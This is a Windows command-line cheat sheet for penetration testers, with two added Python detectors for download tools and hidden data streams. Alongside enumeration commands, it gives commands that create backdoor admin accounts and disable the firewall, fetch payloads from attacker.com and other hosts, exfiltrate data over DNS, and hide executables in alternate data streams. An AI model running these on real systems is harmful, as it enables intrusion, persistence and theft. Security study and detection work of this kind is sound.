# Basic Win CMD for Pentesters

## System info

### Version and patches info

```bash
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get architecture
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #Get only that information
wmic computersystem LIST full #Get PC info
wmic qfe get Caption,Description,HotFixID,InstalledOn #Patches
wmic qfe list brief #Updates
hostname
DRIVERQUERY #3rd party driver vulnerable?
```

### Environment

```bash
set #List all environment variables
```

Some environment variables to highlight:

* **COMPUTERNAME**: Name of the computer
* **TEMP/TMP:** Temp folder
* **USERNAME:** User name
* **HOMEPATH/USERPROFILE:** Home directory
* **windir:** C:\Windows
* **OS**: Windows OS
* **LOGONSERVER**: Name of the domain controller
* **USERDNSDOMAIN**: Domain name to use with DNS
* **USERDOMAIN**: Name of the domain

```bash
nslookup %LOGONSERVER%.%USERDNSDOMAIN% #DNS request for DC
```

### Mounted disks

```bash
(wmic logicaldisk get caption 2>nul | more) || (fsutil fsinfo drives 2>nul)
wmic logicaldisk get caption,description,providername
```

### [Defender](authentication-credentials-uac-and-efs.md#defender)

### Recycle Bin

```bash
dir C:\$Recycle.Bin /s /b
```

### Processes, Services & Software

```bash
schtasks /query /fo LIST /v #Verbose out of scheduled tasks
schtasks /query /fo LIST 2>nul | findstr TaskName
schtasks /query /fo LIST /v > schtasks.txt; cat schtasks.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
tasklist /V #List processes
tasklist /SVC #links processes to started services
net start #Windows Services started
wmic service list brief #List services
sc query #List of services
dir /a "C:\Program Files" #Installed software
dir /a "C:\Program Files (x86)" #Installed software
reg query HKEY_LOCAL_MACHINE\SOFTWARE #Installed software
```

## Domain info

```bash
# Generic AD info
echo %USERDOMAIN% #Get domain name
echo %USERDNSDOMAIN% #Get domain name
echo %logonserver% #Get name of the domain controller
set logonserver #Get name of the domain controller
set log #Get name of the domain controller
gpresult /V # Get current policy applied
wmic ntdomain list /format:list #Displays information about the Domain and Domain Controllers

# Users
dsquery user #Get all users
net user /domain #List all users of the domain
net user <ACCOUNT_NAME> /domain #Get information about that user
net accounts /domain #Password and lockout policy
wmic useraccount list /format:list #Displays information about all local accounts and any domain accounts that have logged into the device
wmic /NAMESPACE:\\root\directory\ldap PATH ds_user GET ds_samaccountname #Get all users
wmic /NAMESPACE:\\root\directory\ldap PATH ds_user where "ds_samaccountname='user_name'" GET # Get info of 1 user
wmic sysaccount list /format:list # Dumps information about any system accounts that are being used as service accounts.

# Groups
net group /domain #List of domain groups
net localgroup administrators /domain #List users that belong to the administrators group inside the domain (the group "Domain Admins" is included here)
net group "Domain Admins" /domain #List users with domain admin privileges
net group "domain computers" /domain #List of PCs connected to the domain
net group "Domain Controllers" /domain #List PC accounts of domain controllers
wmic group list /format:list # Information about all local groups
wmic /NAMESPACE:\\root\directory\ldap PATH ds_group GET ds_samaccountname #Get all groups
wmic /NAMESPACE:\\root\directory\ldap PATH ds_group where "ds_samaccountname='Domain Admins'" Get ds_member /Value #Members of the group
wmic path win32_groupuser where (groupcomponent="win32_group.name=\"domain admins\",domain=\"DOMAIN_NAME\"") #Members of the group

# Computers
dsquery computer #Get all computers
net view /domain #List of PCs of the domain
nltest /dclist:<DOMAIN> #List domain controllers
wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_samaccountname #All computers
wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_dnshostname #All computers

# Trust relations
nltest /domain_trusts #Mapping of the trust relationships

# Get all objects inside an OU
dsquery * "CN=Users,DC=INLANEFREIGHT,DC=LOCAL"
```

### Logs & Events

```bash
#Make a security query using other credentials
wevtutil qe security /rd:true /f:text /r:helpline /u:HELPLINE\zachary /p:0987654321
```

## Users & Groups

### Users

```bash
#Me
whoami /all #All info about me, take a look at the enabled tokens
whoami /priv #Show only privileges

# Local users
net users #All users
dir /b /ad "C:\Users"
net user %username% #Info about a user (me)
net accounts #Information about password requirements
wmic USERACCOUNT Get Domain,Name,Sid
net user /add [username] [password] #Create user

# Other users logged in
qwinsta #Anyone else logged in?

#Launch new cmd.exe with new creds (to impersonate in network)
runas /netonly /user:<DOMAIN>\<NAME> "cmd.exe" ::The password will be prompted

#Check current logon session as administrator using logonsessions from sysinternals
logonsessions.exe
logonsessions64.exe
```

### Groups

```bash
#Local
net localgroup #All available groups
net localgroup Administrators #Info about a group (admins)
net localgroup administrators [username] /add #Add user to administrators

#Domain
net group /domain #Info about domain groups
net group /domain <domain_group_name> #Users that belong to the group
```

### List sessions

```
qwinsta
klist sessions
```

### Password Policy

```
net accounts
```

### Credentials

```bash
cmdkey /list #List credential
vaultcmd /listcreds:"Windows Credentials" /all #List Windows vault
rundll32 keymgr.dll, KRShowKeyMgr #You need graphical access
```

### Persistence with users

```bash
# Add domain user and put them in Domain Admins group
net user username password /ADD /DOMAIN
net group "Domain Admins" username /ADD /DOMAIN

# Add local user and put them in the local Administrators group
net user username password /ADD
net localgroup Administrators username /ADD

# Add user to interesting groups:
net localgroup "Remote Desktop Users" UserLoginName /add
net localgroup "Debugger users" UserLoginName /add
net localgroup "Power users" UserLoginName /add
```

## Network

### Interfaces, Routes, Ports, Hosts and DNS Cache

```bash
ipconfig /all #Info about interfaces
route print #Print available routes
arp -a #Known hosts
netstat -ano #Opened ports?
type C:\WINDOWS\System32\drivers\etc\hosts
ipconfig /displaydns | findstr "Record" | findstr "Name Host"
```

### Firewall

```bash
netsh firewall show state # FW info, open ports
netsh advfirewall firewall show rule name=all
netsh firewall show config # FW info
Netsh Advfirewall show allprofiles

NetSh Advfirewall set allprofiles state off #Turn Off
NetSh Advfirewall set allprofiles state on #Turn On
netsh firewall set opmode disable #Turn Off

#How to open ports
netsh advfirewall firewall add rule name="NetBIOS UDP Port 138" dir=out action=allow protocol=UDP localport=138
netsh advfirewall firewall add rule name="NetBIOS TCP Port 139" dir=in action=allow protocol=TCP localport=139
netsh firewall add portopening TCP 3389 "Remote Desktop"

#Enable Remote Desktop
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh firewall add portopening TCP 3389 "Remote Desktop"
::netsh firewall set service remotedesktop enable #I found that this line is not needed
::sc config TermService start= auto #I found that this line is not needed
::net start Termservice #I found that this line is not needed

#Enable Remote Desktop with wmic
wmic rdtoggle where AllowTSConnections="0" call SetAllowTSConnections "1"
##or
wmic /node:remotehost path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1"

#Enable Remote assistance:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
netsh firewall set service remoteadmin enable

#Ninja combo (New Admin User, RDP + Rassistance + Firewall allow)
net user hacker Hacker123! /add & net localgroup administrators hacker /add & net localgroup "Remote Desktop Users" hacker /add & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall add portopening TCP 3389 "Remote Desktop" & netsh firewall set service remoteadmin enable

::Connect to RDP (using hash or password)
xfreerdp /u:alice /d:WORKGROUP /pth:b74242f37e47371aff835a6ebcac4ffe /v:10.11.1.49
xfreerdp /u:hacker /d:WORKGROUP /p:Hacker123! /v:10.11.1.49
```

### Shares

```bash
net view #Get a list of computers
net view /all /domain [domainname] #Shares on the domains
net view \\computer /ALL #List shares of a computer
net use x: \\computer\share #Mount the share locally
net share #Check current shares
```

### Wifi

```bash
netsh wlan show profile #AP SSID
netsh wlan show profile <SSID> key=clear #Get Cleartext Pass
```

### SNMP

```
reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
```

### Network Interfaces

```bash
ipconfig /all
```

### ARP table

```bash
arp -A
```

## Download

Bitsadmin.exe

```
bitsadmin /create 1
bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe
bitsadmin /RESUME 1
bitsadmin /complete 1
```

CertReq.exe

```
CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt
```

Certutil.exe

```
certutil.exe -urlcache -split -f "http://10.10.14.13:8000/shell.exe" s.exe
```

Desktopimgdownldr.exe

```
set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr
```

Diantz.exe

```
diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab
```

Esentutl.exe

```
esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o
```

Expand.exe

```
expand \\webdav\folder\file.bat c:\ADS\file.bat
```

Extrac32.exe

```
extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt
```

Findstr.exe

```
findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.exe
```

Ftp.exe

```
cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"
```

GfxDownloadWrapper.exe

```
C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE"
```

Hh.exe

```
HH.exe http://some.url/script.ps1
```

Ieexec.exe

```
ieexec.exe http://x.x.x.x:8080/bypass.exe
```

Makecab.exe

```
makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab
```

MpCmdRun.exe

```
MpCmdRun.exe -DownloadFile -url <URL> -path <path> //Windows Defender executable
```

Replace.exe is a command-line utility that replaces files in a directory. Pentesters can use it to quickly replace files with malicious payloads during a penetration test.

```
replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A
```

Excel.exe

```
Excel.exe http://192.168.1.10/TeamsAddinLoader.dll
```

Powerpnt.exe

```
Powerpnt.exe "http://192.168.1.10/TeamsAddinLoader.dll"
```

Squirrel.exe

```
squirrel.exe --download [url to package]
```

Update.exe

```
Update.exe --download [url to package]
```

Winword.exe

```
winword.exe "http://192.168.1.10/TeamsAddinLoader.dll"
```

wsl.exe

```
wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'
```
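
Each download command above leaves a recognizable process command line in process-creation logs. The following Python detector is an added example, not part of the original page: it normalizes caret and quote obfuscation and matches the tools and switches listed in this section. The rule names, the `Host`/`CommandLine` field names and the sample events are constructed for illustration.

```python
import re

# Rule names are labels chosen for this example; the binaries and switches
# are the ones shown in the Download section of this page.
RULES = [
    ("bitsadmin-addfile", r"\bbitsadmin(\.exe)?\s.*/addfile\s.*https?://"),
    ("certreq-post", r"\bcertreq(\.exe)?\s.*-post\b.*https?://"),
    ("certutil-urlcache", r"\bcertutil(\.exe)?\s.*[-/]urlcache\b.*https?://"),
    ("desktopimgdownldr-url",
     r"\bdesktopimgdownldr(\.exe)?\s.*/lockscreenurl:https?://"),
    ("mpcmdrun-downloadfile", r"\bmpcmdrun(\.exe)?\s.*-downloadfile\b"),
    ("gfxdownloadwrapper", r"\bgfxdownloadwrapper\.exe\s"),
    ("url-as-argument",
     r"\b(hh|ieexec|excel|winword|powerpnt)(\.exe)?\s+https?://"),
    ("updater-download", r"\b(squirrel|update)(\.exe)?\s+--download\b"),
    # Copy/compress/search utilities reading from a UNC (SMB or WebDAV) path.
    ("unc-source-copy",
     r"\b(diantz|esentutl|expand|extrac32|makecab|replace|findstr)(\.exe)?"
     r"\s.*\\\\[^\\\s]+\\\S"),
    ("ftp-script", r"\bftp(\.exe)?\s.*-s:"),
    ("wsl-dev-tcp", r"\bwsl(\.exe)?\s.*/dev/tcp/"),
]
COMPILED = [(name, re.compile(rx)) for name, rx in RULES]


def normalize(cmdline):
    """Strip cmd.exe carets and double quotes, collapse whitespace and
    lowercase, so that `cer^tutil` and `"http://..."` still match."""
    stripped = cmdline.replace("^", "").replace('"', "")
    return re.sub(r"\s+", " ", stripped).strip().lower()


def classify(cmdline):
    """Return the names of all rules that match one command line."""
    norm = normalize(cmdline)
    return [name for name, rx in COMPILED if rx.search(norm)]


def scan(events):
    """Return (host, rule) pairs for every matching event, in input order."""
    return [(ev["Host"], rule)
            for ev in events
            for rule in classify(ev["CommandLine"])]


# Constructed sample events (not taken from a real log).
SAMPLE_EVENTS = [
    {"Host": "WS01", "CommandLine":
        r'certutil.exe -urlcache -split -f "http://10.10.14.13:8000/shell.exe" s.exe'},
    {"Host": "WS01", "CommandLine":
        r"certutil -hashfile C:\iso\win.iso SHA256"},            # benign use
    {"Host": "WS02", "CommandLine":
        r"esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe "
        r"/d \\otherwebdavserver\webdav\adrestore.exe /o"},
    {"Host": "WS02", "CommandLine":
        r"findstr /i error C:\logs\app.log"},                    # benign use
    {"Host": "WS03", "CommandLine":
        "wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'"},
]

if __name__ == "__main__":
    for host, rule in scan(SAMPLE_EVENTS):
        print(host, rule)
```

Feed it the command-line field of Security event 4688 or Sysmon event 1; matches are triage leads, since several of these tools also have legitimate uses with the same switches.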

## Misc

```bash
cd #Get current dir
cd C:\path\to\dir #Change dir
dir #List current dir
dir /a:h C:\path\to\dir #List hidden files
dir /s /b #Recursive list without shit
time #Get current time
date #Get current date
shutdown /r /t 0 #Reboot now
type <file> #Cat file

#Runas
runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe" #Use saved credentials
runas /netonly /user:<DOMAIN>\<NAME> "cmd.exe" ::The password will be prompted

#Hide
attrib +h file #Set Hidden
attrib -h file #Remove Hidden

#Give full control over a file that you own
icacls <FILE_PATH> /t /e /p <USERNAME>:F
icacls <FILE_PATH> /e /r <USERNAME> #Remove the permission

#Recursive copy to smb
xcopy /hievry C:\Users\security\.yawcam \\10.10.14.13\name\win

#exe2bat to transform exe file in bat file

#ADS
dir /r #Detect ADS
more file.txt:ads.txt #read ADS
powershell (Get-Content file.txt -Stream ads.txt)

# Get error messages from code
net helpmsg 32 #32 is the code in that case
```

### Bypass Char Blacklisting

```bash
echo %HOMEPATH:~6,-11% #\
who^ami #whoami
```

### DOSfuscation

Obfuscates a CMD line

```powershell
git clone https://github.com/danielbohannon/Invoke-DOSfuscation.git
cd Invoke-DOSfuscation
Import-Module .\Invoke-DOSfuscation.psd1
Invoke-DOSfuscation
help
SET COMMAND type C:\Users\Administrator\Desktop\flag.txt
encoding
```

### Listen address ACLs

You can listen on [http://+:80/Temporary\_Listen\_Addresses/](http://+/Temporary\_Listen\_Addresses/) without being administrator.

```bash
netsh http show urlacl
```

### Manual DNS shell

The **attacker** (Kali) must use one of these 2 options:

```bash
sudo responder -I <iface> #Active
sudo tcpdump -i <iface> -A udp and dst port 53 and dst host <KALI_IP> #Passive
```

#### Victim

_**for /f tokens**_ technique: this lets you execute commands, take the first X words of each line and send them through DNS to your server.

```
for /f %a in ('whoami') do nslookup %a <IP_kali> #Get whoami
for /f "tokens=2" %a in ('echo word1 word2') do nslookup %a <IP_kali> #Get word2
for /f "tokens=1,2,3" %a in ('dir /B C:\') do nslookup %a.%b.%c <IP_kali> #List folder
for /f "tokens=1,2,3" %a in ('dir /B "C:\Program Files (x86)"') do nslookup %a.%b.%c <IP_kali> #List that folder
for /f "tokens=1,2,3" %a in ('dir /B "C:\Progra~2"') do nslookup %a.%b.%c <IP_kali> #Same as last one
#More complex commands
for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('whoami /priv ^| findstr /i "enable"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali> #List enabled privileges
```

You can also **redirect** the output and then **read** it.

```
whoami /priv | findstr "Enab" > C:\Users\Public\Documents\out.txt
for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('type "C:\Users\Public\Documents\out.txt"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali>
```

## Calling CMD from C code

```c
#include <stdlib.h>     /* system, NULL, EXIT_FAILURE */

// When executed by Administrator this program will create a user and then add him to the administrators group
// i686-w64-mingw32-gcc addmin.c -o addmin.exe
// upx -9 addmin.exe

int main (){
    int i;
    i=system("net users otherAcc 0TherAcc! /add");
    i=system("net localgroup administrators otherAcc /add");
    return 0;
}
```

## Alternate Data Streams CheatSheet (ADS/Alternate Data Stream)

Examples taken from **[https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f](https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f)**. There are a lot more in there!

```bash
## Selected Examples of ADS Operations ##

### Adding Content to ADS ###
# Append executable to a log file as an ADS
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
# Download a script directly into an ADS
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt

### Discovering ADS Content ###
# List files and their ADS
dir /R
# Use Sysinternals tool to list ADS of a file
streams.exe <c:\path\to\file>

### Extracting Content from ADS ###
# Extract an executable stored in an ADS
expand c:\ads\file.txt:test.exe c:\temp\evil.exe

### Executing ADS Content ###
# Execute an executable stored in an ADS using WMIC
wmic process call create '"C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"'
# Execute a script stored in an ADS using PowerShell
powershell -ep bypass - < c:\temp:ttt
```
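
To review `dir /R` output at scale, the stream lines can be parsed and filtered. The following Python parser is an added example, not part of the original page or the referenced gist: it assumes English-locale `dir /R /S` output, treats only `Zone.Identifier` as an expected stream (an allowlist to tune per environment), and runs on a constructed sample listing.

```python
import ntpath
import re

# Constructed sample of `dir /R /S` output (not captured from a real host).
SAMPLE_DIR_R = r"""
 Directory of C:\temp

02/05/2024  03:25 AM    <DIR>          .
02/05/2024  03:25 AM    <DIR>          ..
02/05/2024  03:25 AM                12 file.txt
                                45,056 file.txt:test.exe:$DATA
02/05/2024  03:25 AM           102,400 setup.exe
                                    26 setup.exe:Zone.Identifier:$DATA
               2 File(s)        102,412 bytes

 Directory of C:\

02/05/2024  03:25 AM    <DIR>          temp
                                 1,337 temp:ttt:$DATA
"""

# "Directory of" is the English-locale header (assumption of this example).
DIR_LINE = re.compile(r"^\s*Directory of (?P<dir>.+?)\s*$")
# Stream lines carry no date: indentation, size, then name:stream:$DATA.
STREAM_LINE = re.compile(
    r"^\s+(?P<size>[\d,.]+)\s+(?P<file>[^:]+):(?P<stream>[^:]+):\$DATA\s*$"
)
# Streams Windows itself writes; extend for your environment (assumption).
EXPECTED_STREAMS = {"zone.identifier"}


def parse_dir_r(text):
    """Return one dict per named stream found in `dir /R` output."""
    current_dir = ""
    found = []
    for line in text.splitlines():
        m = DIR_LINE.match(line)
        if m:
            current_dir = m.group("dir")
            continue
        m = STREAM_LINE.match(line)
        if m:
            found.append({
                "path": ntpath.join(current_dir, m.group("file")),
                "stream": m.group("stream"),
                # Drop thousands separators, whichever the locale uses.
                "size": int(re.sub(r"[,.]", "", m.group("size"))),
            })
    return found


def unexpected_streams(text):
    """Return 'path:stream' for every stream outside the allowlist."""
    return [
        f'{s["path"]}:{s["stream"]}'
        for s in parse_dir_r(text)
        if s["stream"].lower() not in EXPECTED_STREAMS
    ]


if __name__ == "__main__":
    for hit in unexpected_streams(SAMPLE_DIR_R):
        print(hit)
```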